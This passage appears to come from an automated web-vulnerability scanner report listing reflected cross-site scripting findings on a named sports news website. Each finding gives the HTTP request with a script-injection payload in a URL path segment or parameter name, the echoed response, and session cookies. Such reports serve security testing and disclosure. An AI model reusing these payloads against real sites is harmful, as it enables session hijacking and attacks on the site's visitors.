Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:05 GMT
Content-Length: 818
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmldbfd4<script>alert(1)</script>a999fa7914c"</strong>
...[SNIP]...

2.196. http://www.csnbaltimore.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 482cc<script>alert(1)</script>7bb299f040c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html482cc<script>alert(1)</script>7bb299f040c HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:09 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html482cc<script>alert(1)</script>7bb299f040c"</strong>
...[SNIP]...

2.197. http://www.csnbaltimore.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2df49<script>alert(1)</script>ad9caa4b51a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html2df49<script>alert(1)</script>ad9caa4b51a HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:10 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html2df49<script>alert(1)</script>ad9caa4b51a"</strong>
...[SNIP]...

2.198. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11101<script>alert(1)</script>7ea30cac90f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common11101<script>alert(1)</script>7ea30cac90f/global_flash/player/player.php HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:05 GMT
Content-Length: 795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common11101<script>alert(1)</script>7ea30cac90f/global_flash/player/player.php"</strong>
...[SNIP]...

2.199. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42796<script>alert(1)</script>16425f7544b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash42796<script>alert(1)</script>16425f7544b/player/player.php HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:07 GMT
Content-Length: 795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash42796<script>alert(1)</script>16425f7544b/player/player.php"</strong>
...[SNIP]...

2.200. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b920<script>alert(1)</script>7b7a88bb32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player7b920<script>alert(1)</script>7b7a88bb32/player.php HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:07 GMT
Content-Length: 794
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player7b920<script>alert(1)</script>7b7a88bb32/player.php"</strong>
...[SNIP]...

2.201. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 427d9<script>alert(1)</script>4409074b274 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.php427d9<script>alert(1)</script>4409074b274 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:08 GMT
Content-Length: 795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.php427d9<script>alert(1)</script>4409074b274"</strong>
...[SNIP]...

2.202. http://www.csnbaltimore.com/common/js/aggregate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2bec9<script>alert(1)</script>475f72e549d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/2bec9<script>alert(1)</script>475f72e549d HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:01 GMT
Content-Length: 768
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/2bec9<script>alert(1)</script>475f72e549d"</strong>
...[SNIP]...

2.203. http://www.csnbaltimore.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c87c9<script>alert(1)</script>f27a974b0cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c87c9<script>alert(1)</script>f27a974b0cb HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:47 GMT
Connection: close
Content-Length: 758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/c87c9<script>alert(1)</script>f27a974b0cb"</strong>
...[SNIP]...

2.204. http://www.csnbaltimore.com/pages/landing [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/landing

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec77d<script>alert(1)</script>9b71b5ef431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesec77d<script>alert(1)</script>9b71b5ef431/landing HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Content-Length: 771
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesec77d<script>alert(1)</script>9b71b5ef431/landing"</strong>
...[SNIP]...

2.205. http://www.csnbaltimore.com/pages/landing [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/landing

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 662ba<script>alert(1)</script>16228c3e9fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/landing662ba<script>alert(1)</script>16228c3e9fd HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:13 GMT
Content-Length: 790
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/landing662ba<script>alert(1)</script>16228c3e9fd"</strong>
...[SNIP]...

2.206. http://www.csnbaltimore.com/pages/landing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/landing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7173f"><script>alert(1)</script>6e8be881a63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/landing?7173f"><script>alert(1)</script>6e8be881a63=1 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 30978
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web1.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="7173f"><script>alert(1)</script>6e8be881a63" id = "7173f">
...[SNIP]...

2.207. http://www.csnbaltimore.com/pages/main [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93041<script>alert(1)</script>c8d8901bf53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages93041<script>alert(1)</script>c8d8901bf53/main HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Referer: http://www.csnbaltimore.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:00 GMT
Connection: close
Content-Length: 768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages93041<script>alert(1)</script>c8d8901bf53/main"</strong>
...[SNIP]...

2.208. http://www.csnbaltimore.com/pages/main [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf476<script>alert(1)</script>07c535177df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/maincf476<script>alert(1)</script>07c535177df HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Referer: http://www.csnbaltimore.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:00 GMT
Connection: close
Content-Length: 787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/maincf476<script>alert(1)</script>07c535177df"</strong>
...[SNIP]...

2.209. http://www.csnbaltimore.com/pages/main [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/main

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a7c5"><script>alert(1)</script>9bf552f789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/main?9a7c5"><script>alert(1)</script>9bf552f789=1 HTTP/1.1
Host: www.csnbaltimore.com
Proxy-Connection: keep-alive
Referer: http://www.csnbaltimore.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: PHPSESSID=09af6988921e1a055261e6e4db956dbc; path=/
Vary: Accept-Encoding
Expires: Sun, 19 Dec 2010 18:31:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:00 GMT
Connection: close
Content-Length: 71533

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web4.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="9a7c5"><script>alert(1)</script>9bf552f789" id = "9a7c5">
...[SNIP]...

2.210. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/profiles

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d5a40<script>alert(1)</script>2fc595593ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesd5a40<script>alert(1)</script>2fc595593ef/profiles HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:11 GMT
Content-Length: 772
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesd5a40<script>alert(1)</script>2fc595593ef/profiles"</strong>
...[SNIP]...

2.211. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/profiles

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2e26<script>alert(1)</script>12a624a60d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/profilese2e26<script>alert(1)</script>12a624a60d0 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:12 GMT
Content-Length: 791
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/profilese2e26<script>alert(1)</script>12a624a60d0"</strong>
...[SNIP]...

2.212. http://www.csnbaltimore.com/pages/profiles [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /pages/profiles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3344"><script>alert(1)</script>b44822d3468 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/profiles?c3344"><script>alert(1)</script>b44822d3468=1 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 38937
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--

-->
<meta http-equiv="Content-Type" content="text/html; charset=U
...[SNIP]...
<input type=hidden name="c3344"><script>alert(1)</script>b44822d3468" id = "c3344">
